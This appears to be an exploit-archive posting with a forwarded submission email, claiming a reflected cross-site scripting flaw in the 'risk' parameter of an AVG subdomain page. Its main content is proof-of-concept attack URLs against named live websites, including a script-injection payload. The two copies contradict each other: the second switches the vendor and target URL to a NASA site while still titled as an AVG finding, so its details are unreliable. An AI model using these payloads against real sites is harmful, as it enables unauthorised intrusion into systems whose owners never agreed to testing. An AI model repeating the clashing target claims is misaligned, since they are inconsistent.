# Exploit Title: AVG Subdomain XSS Vulnerability # Google Dork: N/A # Date: 2015/12/29 # Exploit Author: RootByte # Vendor Homepage: http://webtuneup.avg.com/ # Software Link: N/A # Version: N/A # Tested on: Windows 10 / FireFox # CVE : N/A ~ # Vulnerable Location: http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html ~ # Variable: risk ~ # Using this script for XSS Vunerability Testing : &searchParams={"lang":"en","pid":"pid","v":" vv"} ~ # Our Finally address is webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=&searchParams={"lang":"en","pid":"pid","v":" vv"} # Discovered by: RootByte # Page: https://www.facebook.com/Rootbyte/ # Contact: https://www.facebook.com/groups/RootByte/ RootByte: Pentester | Security Researcher -------- Original Message -------- Subject: AVG Subdomain XSS Vulnerability Local Time: December 31 2015 10:10 am UTC Time: December 31 2015 6:10 pm From: RootByte@protonmail.com To: submissions@packetstormsecurity.com # Exploit Title : AVG Subdomain XSS Vulnerability # Exploit Author : RootByte # Date : 2015/12/29 # Tested on : FireFox # Vendor HomePage : https://ghrc.nsstc.nasa.gov/ # Google Dork : use your brain # Category : Web Application ~ # Vulnerable Location: http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html ~ # Variable: risk ~ # Using this script for XSS Vunerability Testing : &searchParams={"lang":"en","pid":"pid","v":" vv"} ~ # Our Finally address is :https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E # Discovered by : RootByte # Page: https://www.facebook.com/Rootbyte/ # Contact: https://www.facebook.com/groups/RootByte/ RootByte: Pentester | Security Researcher